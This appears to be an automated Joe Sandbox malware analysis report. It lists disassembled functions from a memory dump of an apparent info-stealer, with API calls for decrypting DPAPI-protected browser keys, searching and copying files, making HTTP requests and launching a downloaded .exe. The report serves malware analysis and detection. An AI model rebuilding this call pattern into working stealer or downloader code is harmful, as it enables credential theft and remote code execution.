Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: 525d6d17be897e1b7ab5bcb30ede5e6d8143d7fcec86b7182ff276bc58d86030
Instruction ID: ae118a304597d2e6a2b33aab9d5856ab63cf3e9560af7ea739d29bf5c2880e69
Opcode Fuzzy Hash: 525d6d17be897e1b7ab5bcb30ede5e6d8143d7fcec86b7182ff276bc58d86030
Instruction Fuzzy Hash: C3219232E4020AABDF54FA94DC459DD77B8FF81360F508665E954A7182DF30EA49CB50

Function 0009665F Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD

lstrcatA.KERNEL32(?,00000000), ref: 000966A7
lstrcatA.KERNEL32(?,000B6B4C), ref: 000966C4
lstrcatA.KERNEL32(?), ref: 000966D7
lstrcatA.KERNEL32(?,000B6B50), ref: 000966E9

Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096018
Part of subcall function 00095FD1: FindFirstFileA.KERNEL32(?,?), ref: 0009602F
Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB4), ref: 00096050
Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB8), ref: 0009606A
Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096091
Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6647), ref: 000960A5
Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960C2
Part of subcall function 00095FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000960EF
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?), ref: 00096125
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD0), ref: 00096137
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 0009614A
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD4), ref: 0009615C
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 00096170

Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960D9
Part of subcall function 00095FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00096229
Part of subcall function 00095FD1: DeleteFileA.KERNEL32(?), ref: 0009629D
Part of subcall function 00095FD1: FindNextFileA.KERNEL32(?,?), ref: 000962FF
Part of subcall function 00095FD1: FindClose.KERNEL32(?), ref: 00096313

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 68688ae5ad39a5978ffba808b0eca746f38d0d3c73ed5bd26a9e7787914a4489
Instruction ID: e60108bdbc7dca95f9d7ac13649183912406d18ad2d5320f77fc3d34e73a870a
Opcode Fuzzy Hash: 68688ae5ad39a5978ffba808b0eca746f38d0d3c73ed5bd26a9e7787914a4489
Instruction Fuzzy Hash: BA218E3590111CABCF50FB60EC4AED9B7B9EF14300F4140A2BA89A7291EFB59EC58F41

Function 00090CC0 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,000B65B6,?,?,?), ref: 00090CD8
HeapAlloc.KERNEL32(00000000), ref: 00090CDF
GetLocalTime.KERNEL32(?), ref: 00090CEB
wsprintfA.USER32 ref: 00090D16

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 9202439d6efda61f8fdd8d2312affe53681badb84df9a39552026068e8476977
Instruction ID: 4179d4b6a23a2a0eb53604932d98cd287aac44438df23b761a3cbb6b2e81fbde
Opcode Fuzzy Hash: 9202439d6efda61f8fdd8d2312affe53681badb84df9a39552026068e8476977
Instruction Fuzzy Hash: 85F031A1D01118BBDF50BFE5AC09ABF77BCAB0C755F410186F941E6180E6389E40D771

Function 00092166 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00094FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00094FAC,?), ref: 00092181
GetFileSizeEx.KERNEL32(00000000,00094FAC,?,?,?,00094FAC,?), ref: 00092199
CloseHandle.KERNEL32(00000000,?,?,?,00094FAC,?), ref: 000921A4
CloseHandle.KERNEL32(00000000,?,?,?,00094FAC,?), ref: 000921AC

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 121f906e6f7229e960d9567aab851cfdf3967d9c8f472c419a35f9cf4cb468a0
Instruction ID: 39cce8d831adc8cc7f0c514f1d3b9338c39ad83f8cca3f9b3cc1a308d5fe7eff
Opcode Fuzzy Hash: 121f906e6f7229e960d9567aab851cfdf3967d9c8f472c419a35f9cf4cb468a0
Instruction Fuzzy Hash: BAF0A731A42214FBFF60A7A0FC0DFDE7B6CEB14760F210211FA41AA1D0D7706E4096A4

Function 00092BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00085237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0008527E
Part of subcall function 00085237: RtlAllocateHeap.NTDLL(00000000), ref: 00085285
Part of subcall function 00085237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 000852A7
Part of subcall function 00085237: StrCmpCA.SHLWAPI(?), ref: 000852C1
Part of subcall function 00085237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000852F1
Part of subcall function 00085237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00085330
Part of subcall function 00085237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00085360
Part of subcall function 00085237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0008536B

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 00092446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00094A8D), ref: 00092460

_memset.LIBCMT ref: 00092CDF
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,000B6710), ref: 00092D31

Strings

.exe, xrefs: 00092C3C

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
String ID: .exe
API String ID: 2831197775-4119554291
Opcode ID: 4dbe3808bb2ef7597c1ae3919be64870a1f984fa1e4062adad5b1efc0e1364bb
Instruction ID: 75d2a6464489db6cfb1a44467ae6509e185cbdc45e73ef7177075a4ea7d18e89
Opcode Fuzzy Hash: 4dbe3808bb2ef7597c1ae3919be64870a1f984fa1e4062adad5b1efc0e1364bb
Instruction Fuzzy Hash: B3413972A40118AFDF11BBA4EC42ADE77B8AF40304F110161FA94B7163DB70AE4A9BD1

Function 00096330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00096378
lstrcatA.KERNEL32(?), ref: 00096396

Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096018
Part of subcall function 00095FD1: FindFirstFileA.KERNEL32(?,?), ref: 0009602F
Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB4), ref: 00096050
Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB8), ref: 0009606A
Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096091
Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6647), ref: 000960A5
Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960C2
Part of subcall function 00095FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000960EF
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?), ref: 00096125
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD0), ref: 00096137
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 0009614A
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD4), ref: 0009615C
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 00096170

Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960D9
Part of subcall function 00095FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00096229
Part of subcall function 00095FD1: DeleteFileA.KERNEL32(?), ref: 0009629D
Part of subcall function 00095FD1: FindNextFileA.KERNEL32(?,?), ref: 000962FF
Part of subcall function 00095FD1: FindClose.KERNEL32(?), ref: 00096313

Strings

nz, xrefs: 000964AE

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: nz
API String ID: 2104210347-285480672
Opcode ID: 4abdd7587dbf5400474f9d2da3666714aca39a05f22411cad2ddcf305df69391
Instruction ID: 02c4d6b2256109e91c46bc91eab7332f06b5b8bed63bfa2ec0751ac43bd8e8c0
Opcode Fuzzy Hash: 4abdd7587dbf5400474f9d2da3666714aca39a05f22411cad2ddcf305df69391
Instruction Fuzzy Hash: F1319E72D0100DAFDF01BB60EC46EE8777DFB08310F4504A6B609A7262EAB25E519F61

Function 0008F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0008F0D6
_memmove.LIBCMT ref: 0008F104

Strings

string too long, xrefs: 0008F0D1

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 0c5af81496cac43677fe6aeb42c3c2037d78f93dc812e685693d27ece28ea6c6
Instruction ID: 7f1d0032f2da21e7a160440689b8174dbca1e3c26b915e86ae528014f486c5bf
Opcode Fuzzy Hash: 0c5af81496cac43677fe6aeb42c3c2037d78f93dc812e685693d27ece28ea6c6
Instruction Fuzzy Hash: B3119171300242EF9B24FE7CDC45979B3A9FB813607140239F5918B242C761ED918BA1

Function 00091ECF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00091EF9

Strings

image/jpeg, xrefs: 00091F21

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: malloc
String ID: image/jpeg
API String ID: 2803490479-3785015651
Opcode ID: 438c5ffd1c970a5907cf97a86b809dcac0d676b5d8a5e639772e5f15fe2fd87f
Instruction ID: 7abb9147598b8d07e09eb5349a6ffc015deba619f99781503571bb79be7a7c58
Opcode Fuzzy Hash: 438c5ffd1c970a5907cf97a86b809dcac0d676b5d8a5e639772e5f15fe2fd87f
Instruction Fuzzy Hash: 3B11A172E00109FFCF209FA5DC888DEBB79FF05360B21027AF921A61E0D7719E44AA50

Function 0008F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0008F13E

Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC5A
Part of subcall function 000AEC45: __CxxThrowException@8.LIBCMT ref: 000AEC6F
Part of subcall function 000AEC45: std::exception::exception.LIBCMT ref: 000AEC80

Part of subcall function 0008F238: std::_Xinvalid_argument.LIBCPMT ref: 0008F242

_memmove.LIBCMT ref: 0008F190

Strings

invalid string position, xrefs: 0008F139

Memory Dump Source

